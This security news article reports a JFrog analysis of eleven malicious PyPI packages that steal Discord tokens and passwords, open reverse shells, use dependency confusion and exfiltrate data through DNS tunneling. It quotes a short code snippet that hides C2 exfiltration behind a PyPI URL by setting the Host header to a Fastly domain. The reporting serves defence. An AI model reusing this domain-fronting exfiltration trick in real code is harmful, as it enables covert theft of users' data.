JFrog researchers have discovered 11 malicious Python packages in the Python Package Index (PyPI) repository that can steal Discord access tokens, passwords, and even carry out dependency confusion attacks.
Below is the list of malicious Python packages:
The packages “importantpackage,” “10Cent10,” and “10Cent11” were able to establish a reverse shell on the compromised machine.
Experts pointed out that the “importantpackage” abused CDN TLS termination for data exfiltration. It uses the Fastly CDN to disguise communications with the C2 server as a communication with pypi.org.
“The malware’s communication is quite simple:
url = "https://pypi.python.org" + "/images" + "?" + "guid=" + b64_payload
r = request.Request(url, headers = {'Host': "psec.forward.io.global.prod.fastly.net"})
This code causes an HTTPS request to be sent to pypi.python.org (which is indistinguishable from a legitimate request to PyPI,) which later gets rerouted by the CDN as an HTTP request to the C2 server psec.forward.io.global.prod.fastly.net (and vice versa, allowing for two-way communication).” states the report published by JFrog.
The “ipboards” and “trrfab” packages were able to exfiltrate sensitive information by using a technique called dependency confusion.
The dependency confusion technique consists of uploading tainted components that have the same name as the legitimate internal private packages, but with a higher version and uploaded to public repositories. This technique tricks the target’s package manager into downloading and installing the malicious module.
The “ipboards” and “pptest” packages were discovered using DNS tunneling for data exfiltration, this is the first time that this technique has been used by malicious pac in malware uploaded to PyPI.
“While this set of malicious packages may not have the same ‘teeth’ as our previous discoveries, what’s notable is the increasing level of sophistication with which they are executed. It’s not reaching for your wallet in broad daylight – but there is a lot more subterfuge going on with these packages, and some of them may even be setting up for a follow-up attack after the initial reconnaissance, instead of running a highly-compromising payload to start.” concludes the report.
Follow me on Twitter: @securityaffairs and Facebook
[adrotate banner=”9″] | [adrotate banner=”12″] |
(SecurityAffairs – hacking, Operation Cyclone)
[adrotate banner=”5″]
[adrotate banner=”13″]